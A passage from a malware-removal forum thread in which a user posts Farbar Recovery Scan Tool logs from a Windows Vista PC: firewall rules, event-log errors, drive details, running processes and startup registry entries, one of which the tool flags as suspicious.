FirewallRules: [WinCollab-DFSR-In-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [{8231B56C-8AA5-4DB1-B7BA-6EFB9852FD11}] => (Allow) C:\Program Files (x86)\Dell Video Chat\DellVideoChat.exe
FirewallRules: [{0FA34347-DBB4-496F-B057-0C7BF90A1765}] => (Allow) C:\Program Files (x86)\Dell Video Chat\DellVideoChat.exe
FirewallRules: [{8502FBEE-4902-4E12-A440-C2763044592F}] => (Allow) C:\Program Files\CyberLink\PowerDVD DX\PowerDVD.exe
FirewallRules: [{5E33A72A-0EB8-460A-9E79-5D33349705F9}] => (Allow) C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
FirewallRules: [{BD42D8D3-0C82-488B-9C36-3D9EB63A2D47}] => (Allow) C:\Program Files (x86)\Common Files\aol\acs\AOLDial.exe
FirewallRules: [{5FEE2D57-74DF-4148-A2E5-72A86B75C649}] => (Allow) C:\Program Files (x86)\Common Files\aol\acs\AOLDial.exe
FirewallRules: [{2043639E-B5B7-45C2-A99F-099EE9BF8A7F}] => (Allow) C:\Program Files (x86)\Common Files\aol\acs\AOLacsd.exe
FirewallRules: [{9E797555-45B8-4FB8-923F-E68BDEB2EBEE}] => (Allow) C:\Program Files (x86)\Common Files\aol\acs\AOLacsd.exe
FirewallRules: [{F81AE30B-FB0E-41A3-B68E-80D46134D9B0}] => (Allow) C:\Program Files (x86)\Common Files\aol\1225226945\ee\aolsoftware.exe
FirewallRules: [{BD52F696-9697-404A-8F39-0A96E032C374}] => (Allow) C:\Program Files (x86)\Common Files\aol\1225226945\ee\aolsoftware.exe
FirewallRules: [{31B9103E-D02A-4E8F-8758-18B5A8675784}] => (Allow) C:\Program Files (x86)\AOL 9.1\waol.exe
FirewallRules: [{CABA289E-319E-4F0E-B8D0-517C3694EABF}] => (Allow) C:\Program Files (x86)\AOL 9.1\waol.exe
FirewallRules: [{5A50C113-6BC3-4BBD-9713-BB86E933EA01}] => (Allow) C:\Program Files (x86)\Common Files\aol\TopSpeed\3.0\aoltpsd3.exe
FirewallRules: [{69B57AF6-89DC-4292-9C52-856E7D9A21A2}] => (Allow) C:\Program Files (x86)\Common Files\aol\TopSpeed\3.0\aoltpsd3.exe
FirewallRules: [{305C62F5-F89F-46CD-8566-6EA807C3D1E9}] => (Allow) C:\Program Files (x86)\Common Files\aol\Loader\aolload.exe
FirewallRules: [{25949A3A-27A2-4F0B-9174-7A272D664888}] => (Allow) C:\Program Files (x86)\Common Files\aol\Loader\aolload.exe
FirewallRules: [{E329B7FB-0624-48DE-B80D-27D93D7D4BE6}] => (Allow) C:\Program Files (x86)\Common Files\aol\System Information\sinf.exe
FirewallRules: [{E5481570-F9C4-4B9D-AED4-AB14486A3703}] => (Allow) C:\Program Files (x86)\Common Files\aol\System Information\sinf.exe
FirewallRules: [{6D20654B-BB68-43B8-8DAC-071AE2AB3A4C}] => (Allow) C:\Program Files (x86)\AIM6\aim6.exe
FirewallRules: [{C076B208-40DF-4BDB-A384-26C99A4788D8}] => (Allow) C:\Program Files (x86)\AIM6\aim6.exe
FirewallRules: [TCP Query User{E8828832-CD94-4F98-BCEC-6718AE6A0E7A}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [UDP Query User{8785FD17-DAB9-47FE-BD6E-CD658B66EB99}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [TCP Query User{D3D2A2A0-55F8-43FF-8525-F6A8EF46872B}C:\program files (x86)\myspace\im\myspaceim.exe] => (Block) C:\program files (x86)\myspace\im\myspaceim.exe
FirewallRules: [UDP Query User{92A5C238-8C8A-41A7-ACB0-64A067D672F8}C:\program files (x86)\myspace\im\myspaceim.exe] => (Block) C:\program files (x86)\myspace\im\myspaceim.exe
FirewallRules: [TCP Query User{38458AFF-5900-4E44-B5B8-58A76EFD6139}C:\program files (x86)\java\jre6\bin\java.exe] => (Allow) C:\program files (x86)\java\jre6\bin\java.exe
FirewallRules: [UDP Query User{27263D7D-4D5A-4EAA-91C3-E0C31BB1FA12}C:\program files (x86)\java\jre6\bin\java.exe] => (Allow) C:\program files (x86)\java\jre6\bin\java.exe
FirewallRules: [TCP Query User{54865894-FDCF-4FC8-9619-CA11ADF8679B}C:\program files (x86)\aim\aim.exe] => (Block) C:\program files (x86)\aim\aim.exe
FirewallRules: [UDP Query User{07C7D077-B64F-4DE2-92A2-BE87F38F4C3F}C:\program files (x86)\aim\aim.exe] => (Block) C:\program files (x86)\aim\aim.exe
FirewallRules: [TCP Query User{E4E134F3-AF98-4F8E-B5A5-F27EF069539E}C:\program files (x86)\aim\aim.exe] => (Allow) C:\program files (x86)\aim\aim.exe
FirewallRules: [UDP Query User{F7AE3640-965E-4376-B4E0-ED2511C447F1}C:\program files (x86)\aim\aim.exe] => (Allow) C:\program files (x86)\aim\aim.exe
FirewallRules: [{41FBA0F1-4CC4-49DB-9AF3-3C43BF6940EB}] => (Allow) C:\Program Files (x86)\AOL 9.5\waol.exe
FirewallRules: [{42066CB8-2269-4EDD-B1EB-12668EFC0C0E}] => (Allow) C:\Program Files (x86)\AOL 9.5\waol.exe
FirewallRules: [TCP Query User{0FFD9AE2-49DC-4A3B-9222-151CAD34D34A}C:\program files (x86)\dell video chat\dellvideochat.exe] => (Allow) C:\program files (x86)\dell video chat\dellvideochat.exe
FirewallRules: [UDP Query User{1F2F193F-E345-4494-803A-6D98C83DE9B8}C:\program files (x86)\dell video chat\dellvideochat.exe] => (Allow) C:\program files (x86)\dell video chat\dellvideochat.exe
FirewallRules: [{51486B28-6663-4252-A824-CEBA1D54F916}] => (Allow) C:\Program Files (x86)\MySpace\IM\MySpaceIM.exe
FirewallRules: [{8F8D8C50-4423-4B7B-AAF6-36A5E2A23C55}] => (Allow) C:\Program Files (x86)\AOL 9.5a\waol.exe
FirewallRules: [{57F0A163-F1BC-499C-A843-A80D701B8956}] => (Allow) C:\Program Files (x86)\AOL 9.5a\waol.exe
FirewallRules: [{D2E27BDC-EB2B-462F-BDB0-D8D940D92F09}] => (Allow) C:\Program Files (x86)\AIM7\aim.exe
FirewallRules: [{DC2C19E6-C0E5-4605-A7CD-68F6A98D6F13}] => (Allow) C:\Program Files (x86)\AIM7\aim.exe
FirewallRules: [{A7563E34-3FAD-4A40-9233-143877E59A33}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\wlcsdk.exe
FirewallRules: [{F6C2AF67-C32A-4412-98C6-83E748B9EB7C}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{01628688-915B-4B26-ADD9-DAB44E409517}] => (Allow) svchost.exe
FirewallRules: [{8DDE1490-36E5-4D34-8C0B-686F984DD6BD}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [{F253449D-EAF6-4DAF-8B3E-0C0FC02362D1}] => (Allow) LPort=80
FirewallRules: [{AB026861-E3ED-4AB8-9D00-8F40706056DD}] => (Allow) LPort=80
FirewallRules: [{CB4FD7E5-1D14-476D-A886-8F7DA34C4F39}] => (Allow) LPort=80
FirewallRules: [{18ED92B9-E6F6-478F-A7CF-DAA226DB5B09}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{3AA6A666-40D9-4098-836C-3678C6DAB417}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{EE19CFD7-A08B-464D-87FA-27EF98343EFB}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{9E12FEAE-E4CC-4C77-98DD-AEF13095AD25}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7\waol.exe
FirewallRules: [{2D18DE15-A408-4618-AF38-BAE2E0D58168}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7\waol.exe
FirewallRules: [{9A35707B-BFEF-4299-923F-89C64CEED5C7}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7\AOLBrowser\aolbrowser.exe
FirewallRules: [{A56400D8-4781-4A3F-9043-4FDAA68FCE40}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7\AOLBrowser\aolbrowser.exe
FirewallRules: [{F62F2D50-D7FE-4EF9-8E4E-A94233CC0BCB}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7a\waol.exe
FirewallRules: [{A17346CF-282E-4E1F-B12E-D158BEFAE4FD}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7a\waol.exe
FirewallRules: [{6FA630E9-1B30-41C7-B8A3-339A6485716A}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7a\aolbrowser.exe
FirewallRules: [{65F483B8-6ED7-4871-9A84-E5CA8663F08E}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7a\aolbrowser.exe
FirewallRules: [{644AF81B-C200-4345-9B96-EDF1643EDC83}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7b\waol.exe
FirewallRules: [{F542CAD3-D553-4F23-8E75-511C00DC7433}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7b\waol.exe
FirewallRules: [{1BC7405E-E50B-49D5-B480-78B0E5565002}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{81C826AA-F783-4BB3-9F5C-D59DF9B799CC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{2C2ACD4F-9335-403F-B726-094678DDD218}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

==================== Restore Points =========================

13-06-2016 11:10:08 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============

Name: isatap.hsd1.de.comcast.net.
Description: Microsoft ISATAP Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

==================== Event log errors: =========================

Application errors:
==================
Error: (08/30/2016 10:37:08 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (08/30/2016 10:36:16 AM) (Source: WinDefendRtp) (EventID: 3003) (User: )
Description: Windows Defender Real-Time Protection checkpoint has encountered an error and failed to start.

   User: JHS-JJS-Dell8mg\JHS-JJS

   Checkpoint ID: 24

   Error Code: 0x80070005

   Error description: Access is denied.

Error: (08/30/2016 10:05:11 AM) (Source: WinDefendRtp) (EventID: 3003) (User: )
Description: Windows Defender Real-Time Protection checkpoint has encountered an error and failed to start.

   User: JHS-JJS-Dell8mg\JHS-JJS

   Checkpoint ID: 24

   Error Code: 0x80070005

   Error description: Access is denied.

Error: (08/30/2016 10:03:00 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Windows Live\Photo Gallery\MovieMaker.Exe".Error in manifest or policy file "C:\Program Files (x86)\Windows Live\Photo Gallery\WLMFDS.DLL" on line 8.
Component identity found in manifest does not match the identity of the component requested.
Reference is WLMFDS,processorArchitecture="AMD64",type="win32",version="1.0.0.1".
Definition is WLMFDS,processorArchitecture="x86",type="win32",version="1.0.0.1".
Please use sxstrace.exe for detailed diagnosis.

Error: (08/30/2016 10:03:00 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Windows Live\Photo Gallery\MovieMaker.Exe".Error in manifest or policy file "C:\Program Files (x86)\Windows Live\Photo Gallery\WLMFDS.DLL" on line 8.
Component identity found in manifest does not match the identity of the component requested.
Reference is WLMFDS,processorArchitecture="AMD64",type="win32",version="1.0.0.1".
Definition is WLMFDS,processorArchitecture="x86",type="win32",version="1.0.0.1".
Please use sxstrace.exe for detailed diagnosis.

Error: (08/30/2016 10:02:36 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (08/29/2016 04:18:15 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface. hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.

Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {9051d2d0-3019-4e46-bb45-d95e50f38a4b}

Error: (08/29/2016 03:53:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application uistub.exe, version 22.7.1.32, time stamp 0x57b2e5fb, faulting module MSVCP110.dll, version 6.0.6002.19623, time stamp 0x56ec4641, exception code 0xc0000135, fault offset 0x00000000000b7e68,
process id 0x17f4, application start time 0x01d2022f016ffa80.

Error: (08/29/2016 03:41:35 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (08/29/2016 03:41:00 PM) (Source: WinDefendRtp) (EventID: 3003) (User: )
Description: Windows Defender Real-Time Protection checkpoint has encountered an error and failed to start.

   User: JHS-JJS-Dell8mg\JHS-JJS

   Checkpoint ID: 24

   Error Code: 0x80070005

   Error description: Access is denied.

System errors:
=============
Error: (08/30/2016 10:47:34 AM) (Source: volsnap) (EventID: 20) (User: )
Description: The shadow copies of volume C: were aborted because of a failed free space computation.

Error: (08/30/2016 10:34:32 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} did not register with DCOM within the required timeout.

Error: (08/30/2016 10:02:00 AM) (Source: netbt) (EventID: 4321) (User: )
Description: The name "WORKGROUP      :1d" could not be registered on the interface with IP address 192.168.1.105.
The computer with the IP address 192.168.1.1 did not allow the name to be claimed by
this computer.

Error: (08/30/2016 10:01:47 AM) (Source: Print) (EventID: 19) (User: NT AUTHORITY)
Description: The print spooler failed to share printer Canon MX850 series Printer with shared resource name Canon MX850 series Printer. Error 2114. The printer cannot be used by others on the network.

Error: (08/30/2016 10:01:47 AM) (Source: Print) (EventID: 19) (User: NT AUTHORITY)
Description: The print spooler failed to share printer Canon MX870 series Printer with shared resource name Canon MX870 series Printer. Error 2114. The printer cannot be used by others on the network.

Error: (08/30/2016 10:01:47 AM) (Source: Print) (EventID: 19) (User: NT AUTHORITY)
Description: The print spooler failed to share printer PageManager PDF Writer with shared resource name PageManager PDF Writer. Error 2114. The printer cannot be used by others on the network.

Error: (08/29/2016 04:18:38 PM) (Source: WinDefend) (EventID: 3006) (User: )
Description: Windows Defender Real-Time Protection agent has encountered an error when taking action on spyware or other potentially unwanted software.

For more information please see the following:
Not Applicable

   Scan ID: {FE7166AF-EC58-4E79-A734-5487CDE1A527}

   User: JHS-JJS-Dell8mg\JHS-JJS

   Name: Unknown

   ID:

   Severity ID:

   Category ID:

   Path: driver:ATWPKT2

   Alert Type: Unclassified software

   Action: Quarantine

   Error Code: 0x80508021

   Error description: An unexpected problem occurred. Install any available updates, and then try to start the program again. For information on installing updates, see Help and Support.

Error: (08/29/2016 04:18:38 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} did not register with DCOM within the required timeout.

Error: (08/29/2016 03:51:48 PM) (Source: DCOM) (EventID: 10016) (User: JHS-JJS-Dell8mg)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{0C0A3666-30C9-11D0-8F20-00805F2CD064}
to the user JHS-JJS-Dell8mg\JHS-JJS SID (S-1-5-21-1231050607-2223395895-1768608861-1000) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.

Error: (08/29/2016 03:41:06 PM) (Source: netbt) (EventID: 4321) (User: )
Description: The name "WORKGROUP      :1d" could not be registered on the interface with IP address 192.168.1.105.
The computer with the IP address 192.168.1.1 did not allow the name to be claimed by
this computer.

CodeIntegrity:
===================================
Date: 2016-08-09 12:27:49.555
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.18000_none_0f3cadd61ec3b22c\tcpip.sys because the set of per-page image hashes could not be found on the system.

Date: 2016-08-09 12:27:48.635
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.18000_none_0f3cadd61ec3b22c\tcpip.sys because the set of per-page image hashes could not be found on the system.

Date: 2016-08-09 12:27:47.783
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.18000_none_0f3cadd61ec3b22c\tcpip.sys because the set of per-page image hashes could not be found on the system.

Date: 2016-08-09 12:27:46.987
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.18000_none_0f3cadd61ec3b22c\tcpip.sys because the set of per-page image hashes could not be found on the system.

Date: 2016-08-09 12:27:45.175
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-securestartup-core_31bf3856ad364e35_6.0.6001.18000_none_90f9416caa7c6a08\fveapi.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-08-09 12:27:44.273
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-securestartup-core_31bf3856ad364e35_6.0.6001.18000_none_90f9416caa7c6a08\fveapi.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-08-09 12:27:43.480
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-securestartup-core_31bf3856ad364e35_6.0.6001.18000_none_90f9416caa7c6a08\fveapi.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-08-09 12:27:42.566
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-securestartup-core_31bf3856ad364e35_6.0.6001.18000_none_90f9416caa7c6a08\fveapi.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-08-09 12:27:34.426
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\tcpip.sys because the set of per-page image hashes could not be found on the system.

Date: 2016-08-09 12:27:33.600
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\tcpip.sys because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel® Core™2 Quad CPU Q8200 @ 2.33GHz
Percentage of memory in use: 47%
Total physical RAM: 8190.26 MB
Available physical RAM: 4279.86 MB
Total Virtual: 16431.56 MB
Available Virtual: 12968.73 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:1177.27 GB) (Free:1082.85 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:8.35 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 1192.3 GB) (Disk ID: B0000000)
Partition 1: (Not Active) - (Size=71 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=1177.3 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

#4
[email protected]

Posted 30 August 2016 - 11:11 AM

Member

Topic Starter
Member
18 posts

Two of Two

FRST txt

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 29-08-2016
Ran by JHS-JJS (administrator) on JHS-JJS-DELL8MG (30-08-2016 10:40:30)
Running from C:\Users\JHS-JJS\Desktop
Loaded Profiles: JHS-JJS (Available Profiles: JHS-JJS)
Platform: Windows Vista ™ Home Premium Service Pack 2 (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Andrea Electronics Corporation) C:\Windows\System32\AERTSr64.exe
(AOL Inc.) C:\Program Files (x86)\Common Files\aol\acs\AOLacsd.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7Debug\mdm.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\n360.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Conexant Systems, Inc.) C:\Windows\System32\drivers\XAudio64.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Realtek Semiconductor) C:\Windows\RAVCpl64.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
() C:\Windows\System32\spool\drivers\x64\3\WrtMon.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(W3i, LLC) C:\Program Files (x86)\W3i\InstallIQUpdater\InstallIQUpdater.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPoint\SetPoint.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\ScanSoft\OmniPageSE4\OpWareSE4.exe
(AOL Inc.) C:\Program Files (x86)\Common Files\aol\1225226945\ee\aolsoftware.exe
() C:\Windows\System32\spool\drivers\x64\3\WrtProc.exe
() C:\Program Files\Logitech\SetPoint\x86\SetPoint32.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\n360.exe
(Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\conathst.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1584184 2008-01-20] (Microsoft Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RAVCpl64.exe [6431232 2008-07-18] (Realtek Semiconductor)
HKLM\...\Run: [IAAnotif] => C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe [178712 2008-05-07] (Intel Corporation)
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files (x86)\Canon\SolutionMenu\CNSLMAIN.exe [652624 2007-10-25] (CANON INC.)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2710856 2009-11-01] (CANON INC.)
HKLM\...\Run: [WrtMon.exe] => C:\Windows\system32\spool\drivers\x64\3\WrtMon.exe [20480 2006-09-20] ()
HKLM\...\Run: [Skytel] => Skytel.exe
HKLM-x32\...\Run: [Microsoft Default Manager] => C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM-x32\...\Run: [SunJavaUpdateSched] => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2013-05-01] (Apple Inc.)
HKLM-x32\...\Run: [OpwareSE4] => C:\Program Files (x86)\ScanSoft\OmniPageSE4\OpwareSE4.exe [73728 2007-06-13] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [HostManager] => C:\Program Files (x86)\Common Files\AOL\1225226945\ee\AOLSoftware.exe [41800 2010-03-08] (AOL Inc.)
HKLM-x32\...\Run: [Adobe ARM] => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => C:\Windows\system32\oobefldr.dll [2438656 2009-04-11] (Microsoft Corporation)
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => C:\Windows\system32\oobefldr.dll [2438656 2009-04-11] (Microsoft Corporation)
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [138240 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Run: [**njop<*>] => "C:\Users\JHS-JJS\AppData\Local\b263cb\84e7ae.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Run: [swg] => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Run: [Google Update] => "C:\Users\JHS-JJS\AppData\Local\Google\Update\GoogleUpdate.exe" /c
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Run: [InstallIQUpdater] => C:\Program Files (x86)\W3i\InstallIQUpdater\InstallIQUpdater.exe [1179648 2011-10-11] (W3i, LLC)
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\RunOnce: [Shockwave Updater] => C:\Windows\SysWOW64\Adobe\Shockwave 11\SwHelper_1103472.exe [460216 2009-01-16] (Adobe Systems, Inc.)
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\MountPoints2: {5c7703ed-05b0-11de-9b6c-00038a000015} - M:\LaunchU3.exe
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\MountPoints2: {8817984c-e0b8-11e2-928d-00038a000015} - L:\VZW_Software_upgrade_assistant_installer.exe
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Bubbles.scr [899584 2006-11-02] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security Suite\Engine64\22.7.1.32\buShell.dll [2016-08-15] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security Suite\Engine64\22.7.1.32\buShell.dll [2016-08-15] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security Suite\Engine64\22.7.1.32\buShell.dll [2016-08-15] (Symantec Corporation)
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Logitech SetPoint.lnk [2010-08-20]
ShortcutTarget: Logitech SetPoint.lnk -> C:\Program Files\Logitech\SetPoint\SetPoint.exe (Logitech, Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76 192.168.1.1
Tcpip\..\Interfaces\{7B502934-EB48-4DA8-88AB-AD32601DC390}: [DhcpNameServer] 75.75.75.75 75.75.76.76 192.168.1.1

Internet Explorer:
==================
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.msn.com/?ocid=EIE9HP&PC=UP50
SearchScopes: HKLM-x32 -> {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = hxxp://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50TB50CLie7
